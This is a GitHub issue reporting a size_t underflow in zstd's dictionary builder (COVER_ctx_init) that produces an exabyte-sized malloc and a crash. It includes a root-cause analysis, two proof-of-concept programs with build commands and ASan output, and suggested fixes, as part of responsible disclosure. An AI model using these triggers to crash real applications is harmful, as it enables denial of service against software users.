size_t underflow in COVER_ctx_init when ZDICT_optimizeTrainFromBuffer_cover invoked with params.d=0 leads to multi-EB malloc

## Summary

`COVER_ctx_init()` in `lib/dictBuilder/cover.c` computes a partial-suffix-array
size as `trainingSamplesSize - MAX(d, sizeof(U64)) + 1` (a `size_t` subtraction)
without first checking that `trainingSamplesSize` is large enough. The function
*does* guard against an undersized corpus, but it guards on `totalSamplesSize`,
while it uses `trainingSamplesSize` (a fraction controlled by `params.splitPoint`)
for the subtraction. With `splitPoint < 1.0` and a small corpus the two
quantities diverge and the subtraction underflows, producing
`(size_t)-2` (= `0xfffffffffffffffe`). The next `malloc` request then becomes
roughly `16 EB`, which ASan rejects as `allocation-size-too-big` and which in
production builds returns `NULL` (followed by a SEGV at the next dereference).

The path is most easily reached from `ZDICT_optimizeTrainFromBuffer_cover`,
because that entry point documents `params.d == 0` (and `params.k == 0`) as
"let optimize pick" and then iterates internally over candidate `d` values.
A library consumer that forwards zero-initialized `ZDICT_cover_params_t` to
optimize — exactly what the documentation invites — triggers the bug as soon
as the corpus is small enough.

The `zstd` CLI is *not* affected: `--train-cover` validates and clamps cover
parameters before calling the API.

## Root Cause

`lib/dictBuilder/cover.c`, `COVER_ctx_init()` (function defined at line 628).

The sanity check on the corpus uses `totalSamplesSize`:

```c
// lib/dictBuilder/cover.c:641
  if (totalSamplesSize < MAX(d, sizeof(U64)) ||
      totalSamplesSize >= (size_t)COVER_MAX_SAMPLES_SIZE) {
    ...
    return ERROR(srcSize_wrong);
  }
```

But the subtraction immediately below operates on `trainingSamplesSize`, which
is a fraction (`splitPoint`) of `totalSamplesSize`:

```c
// lib/dictBuilder/cover.c:669-670
  ctx->suffixSize = trainingSamplesSize - MAX(d, sizeof(U64)) + 1;
  ctx->suffix = (U32 *)malloc(ctx->suffixSize * sizeof(U32));
```

When `splitPoint` is the default for optimize (`0.5` after `splitPoint <= 0.0
? COVER_DEFAULT_SPLITPOINT` and consumer overrides) and the corpus is small,
`trainingSamplesSize < MAX(d, sizeof(U64))` even though `totalSamplesSize`
passes the check. The subtraction wraps to `(size_t)-N`, and `malloc()` is
called with `(size_t)-N * sizeof(U32)` ≈ 16 EB.

How `params.d == 0` makes this trivial to hit:
`ZDICT_optimizeTrainFromBuffer_cover` (`cover.c:1197`) maps a zero `params.d`
to a search range:

```c
// lib/dictBuilder/cover.c:1206-1207
  const unsigned kMinD = parameters->d == 0 ? 6 : parameters->d;
  const unsigned kMaxD = parameters->d == 0 ? 8 : parameters->d;
```

and then iterates `for (d = kMinD; d <= kMaxD; d += 2)` (line 1254), calling
`COVER_ctx_init(..., d, splitPoint, ...)` (line 1261) for each candidate. There
is no precondition on the corpus size before the loop, so a caller that hands
optimize a tiny sample set — perfectly valid as far as the documented "let
optimize pick" contract is concerned — drives the inner function into the
underflowing branch.

## PoC

### Trigger file

`crash_input` is a 24-byte blob consumed by the AGF harness. The harness
parses the bytes as `[8-byte header][16 bytes of sample data]`, then derives
`nbSamples` (≥5), per-sample sizes (summing to 16), and the cover parameters
from the header bits. The specific decoded shape that crashes:

- `nbSamples = 10`, ten one-byte samples
- `params.d = 0` (zero-initialized — selects the optimize search)
- `params.k = 0` (likewise)
- `params.splitPoint = 0.5`
- `dictBufferCapacity = 1360`

The header bit pattern leaves `d` and `k` at zero so the harness enters the
`optimize` code path with a very small corpus.

### How to generate

Any input that ends up calling `ZDICT_optimizeTrainFromBuffer_cover` with

- `nbSamples ≥ 5`
- per-sample sizes such that `COVER_sum(first nbTrainSamples) < 8` (e.g. five
  to ten 1-byte samples with `splitPoint = 0.5`)
- zero-initialized `params.d` and `params.k`

will reproduce. Minimal recipe: feed N=10 one-byte samples to optimize with
zeroed params (see `app_realworld.c` below).

---

## Trigger Method 1: Direct libzstd API

`app_realworld.c` — a minimal libzstd consumer that calls the documented
optimize entry point with zero-initialized parameters and ten one-byte samples
(a realistic edge case: training on very short log lines).

```c
/* app_realworld.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ZDICT_STATIC_LINKING_ONLY
#include <zdict.h>

int main(void)
{
    const size_t N = 10;
    unsigned char samples[N];
    size_t sizes[N];
    for (size_t i = 0; i < N; ++i) {
        samples[i] = (unsigned char)('A' + i);
        sizes[i]   = 1;
    }

    const size_t dictCap = 1360;
    void *dict = malloc(dictCap);

    ZDICT_cover_params_t params;
    memset(&params, 0, sizeof(params));
    /* Documented as "let optimize pick" — but underflows downstream. */
    params.d          = 0;
    params.k          = 0;
    params.steps      = 0;
    params.nbThreads  = 1;
    params.splitPoint = 0.50;
    params.zParams.compressionLevel = 0;

    size_t r = ZDICT_optimizeTrainFromBuffer_cover(
        dict, dictCap, samples, sizes, (unsigned)N, &params);
    fprintf(stderr, "ZDICT_optimizeTrainFromBuffer_cover returned: %zu (isError=%d)\n",
            r, ZDICT_isError(r));
    free(dict);
    return 0;
}
```

**Build:**

```bash
ZSTD_SRC=/path/to/zstd
clang -O1 -g -fsanitize=address \
    -I"$ZSTD_SRC/lib" -I"$ZSTD_SRC/lib/dictBuilder" \
    -DZDICT_STATIC_LINKING_ONLY \
    app_realworld.c "$ZSTD_SRC/lib/libzstd.a" -pthread -o app_realworld
```

**Run:**

```bash
ASAN_OPTIONS=detect_leaks=0 ./app_realworld
```

**Output:**

```
==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffff8
   exceeds maximum supported size of 0x10000000000
    #0 0x...... in malloc
    #1 0x...... in COVER_ctx_init lib/dictBuilder/cover.c:670:24
    #2 0x...... in ZDICT_optimizeTrainFromBuffer_cover lib/dictBuilder/cover.c:1261
    #3 0x...... in main app_realworld.c:...
SUMMARY: AddressSanitizer: allocation-size-too-big in malloc
```

Without ASan, `malloc()` returns `NULL` and the next access in `COVER_ctx_init`
SEGVs.

---

## Trigger Method 2: Fuzzer (AGF harness)

`simple_compress.c` — the libFuzzer harness used by AGF. It deterministically
parses the input into samples and cover parameters and calls
`ZDICT_optimizeTrainFromBuffer_cover`.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define ZDICT_STATIC_LINKING_ONLY
#include "zdict.h"

#define MIN_DICT_CAPACITY 256U
#define MAX_DICT_CAPACITY 2048U
#define MAX_SAMPLE_BYTES 4096U
#define MAX_NB_SAMPLES 32U
#define HEADER_SIZE 8U

static size_t min_size(size_t a, size_t b) { return a < b ? a : b; }

int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    if (size < HEADER_SIZE + 8) return 0;

    size_t sampleBytes = min_size(size - HEADER_SIZE, MAX_SAMPLE_BYTES);
    if (sampleBytes < 8) return 0;
    const uint8_t *samplesBuffer = data + HEADER_SIZE;

    unsigned nbSamples = 5U + (unsigned)(data[0] % (MAX_NB_SAMPLES - 4U));
    if ((size_t)nbSamples > sampleBytes) nbSamples = (unsigned)sampleBytes;
    if (nbSamples < 5U) return 0;

    size_t dictBufferCapacity = MIN_DICT_CAPACITY
        + ((size_t)data[1] | ((size_t)data[2] << 8))
          % (MAX_DICT_CAPACITY - MIN_DICT_CAPACITY + 1U);

    void *dictBuffer = malloc(dictBufferCapacity);
    size_t *samplesSizes = (size_t *)malloc((size_t)nbSamples * sizeof(samplesSizes[0]));
    if (!dictBuffer || !samplesSizes) { free(dictBuffer); free(samplesSizes); return 0; }

    /* Build nbSamples non-empty samples whose sizes sum to sampleBytes. */
    size_t remaining = sampleBytes - nbSamples;
    for (unsigned i = 0; i + 1U < nbSamples; ++i) {
        size_t add = remaining
            ? (size_t)data[HEADER_SIZE + (i % sampleBytes)] % (remaining + 1U)
            : 0;
        samplesSizes[i] = 1U + add;
        remaining -= add;
    }
    samplesSizes[nbSamples - 1U] = 1U + remaining;

    ZDICT_cover_params_t params;
    memset(&params, 0, sizeof(params));
    if ((data[3] & 1U) == 0)
        params.d = 6U + 2U * (unsigned)((data[4] >> 4) % 3U);   /* otherwise 0 */
    if ((data[3] & 2U) == 0) {
        unsigned minK = params.d == 0 ? 8U : params.d;
        unsigned range = (unsigned)(dictBufferCapacity - minK + 1U);
        params.k = minK + (unsigned)(data[4] % range);
    }
    if ((data[3] & 4U) == 0) params.steps = 1U + (unsigned)(data[5] % 4U);
    params.nbThreads = 1U;
    if ((data[3] & 8U) != 0 && nbSamples >= 10U)
        params.splitPoint = 0.50 + ((double)(data[6] % 51U) / 100.0);
    else if ((data[3] & 16U) != 0)
        params.splitPoint = 1.0;
    params.zParams.compressionLevel = (int)(data[7] % 10U);

    (void)ZDICT_optimizeTrainFromBuffer_cover(dictBuffer, dictBufferCapacity,
                                              samplesBuffer, samplesSizes,
                                              nbSamples, &params);
    free(samplesSizes);
    free(dictBuffer);
    return 0;
}
```

**Build:**

```bash
clang++ -fsanitize=fuzzer,address -g -O1 \
    -I"$ZSTD_SRC/lib" -I"$ZSTD_SRC/lib/dictBuilder" \
    -DZDICT_STATIC_LINKING_ONLY \
    simple_compress.c "$ZSTD_SRC/lib/libzstd.a" -pthread -o cover_fuzzer
```

**Run on crash_input:**

```bash
ASAN_OPTIONS=detect_leaks=0 ./cover_fuzzer crash_input
```

Same `allocation-size-too-big` at `lib/dictBuilder/cover.c:670` in
`COVER_ctx_init`.

---

## Impact

| Aspect | Details |
|---|---|
| **Type** | Denial of Service (~16 EB malloc; abort under ASan, `NULL`-deref / SEGV otherwise) |
| **Severity** | Low |
| **Attack Vector** | Local; library consumer asks for dictionary optimization via the documented "auto" mode (`params.d == 0` / `params.k == 0`) on a small corpus |
| **Affected Components** | `libzstd` dictBuilder (`lib/dictBuilder/cover.c`, `ZDICT_optimizeTrainFromBuffer_cover` → `COVER_ctx_init`). **Not** the `zstd` CLI — `--train-cover` validates parameters before the API call |
| **Reachability** | Programmatic only: applications that pass zero-initialized `ZDICT_cover_params_t` (or any small `d` paired with a small corpus and `splitPoint < 1.0`) into the optimize entry point |
| **CWE** | CWE-190 (Integer Overflow/Underflow) and CWE-789 (Memory Allocation with Excessive Size Value) |

---

## Suggested Fix

The cleanest local fix is in `COVER_ctx_init` itself: gate the subtraction on
the same quantity that participates in it. In `lib/dictBuilder/cover.c` around
line 641, change the precondition from `totalSamplesSize` to
`trainingSamplesSize` (or add a second check), so the function bails out with
`ERROR(srcSize_wrong)` instead of underflowing at line 669:

```c
/* lib/dictBuilder/cover.c, COVER_ctx_init */
  if (trainingSamplesSize < MAX(d, sizeof(U64)) ||
      totalSamplesSize    < MAX(d, sizeof(U64)) ||
      totalSamplesSize    >= (size_t)COVER_MAX_SAMPLES_SIZE) {
    DISPLAYLEVEL(1, "Total samples size is too small/large (...)");
    return ERROR(srcSize_wrong);
  }
  ...
  ctx->suffixSize = trainingSamplesSize - MAX(d, sizeof(U64)) + 1;
```

Equivalently, clamp the subtraction:

```c
  if (trainingSamplesSize < MAX(d, sizeof(U64)) + 1)
    return ERROR(srcSize_wrong);
  ctx->suffixSize = trainingSamplesSize - MAX(d, sizeof(U64)) + 1;
```

A complementary hardening at the API boundary, in
`ZDICT_optimizeTrainFromBuffer_cover` (`cover.c:1197`), would be to require
that `COVER_sum(samplesSizes, nbSamples) * splitPoint >= kMaxD` before
entering the `for (d = kMinD; d <= kMaxD; d += 2)` loop, so the "auto" mode is
rejected up front when the corpus is too small to support any candidate `d`.

Both changes are small and local; either alone closes the underflow.

---

## Credit

Aisle Research (Ze Sheng, Dmitrijs Trizna, Luigino Camastra, Guido Vranken)


Aspect	Details
Type	Denial of Service (~16 EB malloc; abort under ASan, `NULL`-deref / SEGV otherwise)
Severity	Low
Attack Vector	Local; library consumer asks for dictionary optimization via the documented "auto" mode (`params.d == 0` / `params.k == 0`) on a small corpus
Affected Components	`libzstd` dictBuilder (`lib/dictBuilder/cover.c`, `ZDICT_optimizeTrainFromBuffer_cover` → `COVER_ctx_init`). Not the `zstd` CLI — `--train-cover` validates parameters before the API call
Reachability	Programmatic only: applications that pass zero-initialized `ZDICT_cover_params_t` (or any small `d` paired with a small corpus and `splitPoint < 1.0`) into the optimize entry point
CWE	CWE-190 (Integer Overflow/Underflow) and CWE-789 (Memory Allocation with Excessive Size Value)

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

size_t underflow in COVER_ctx_init when ZDICT_optimizeTrainFromBuffer_cover invoked with params.d=0 leads to multi-EB malloc #4682

Summary

Root Cause

PoC

Trigger file

How to generate

Trigger Method 1: Direct libzstd API

Trigger Method 2: Fuzzer (AGF harness)

Impact

Suggested Fix

Credit

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

size_t underflow in COVER_ctx_init when ZDICT_optimizeTrainFromBuffer_cover invoked with params.d=0 leads to multi-EB malloc #4682

Description

Summary

Root Cause

PoC

Trigger file

How to generate

Trigger Method 1: Direct libzstd API

Trigger Method 2: Fuzzer (AGF harness)

Impact

Suggested Fix

Credit

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions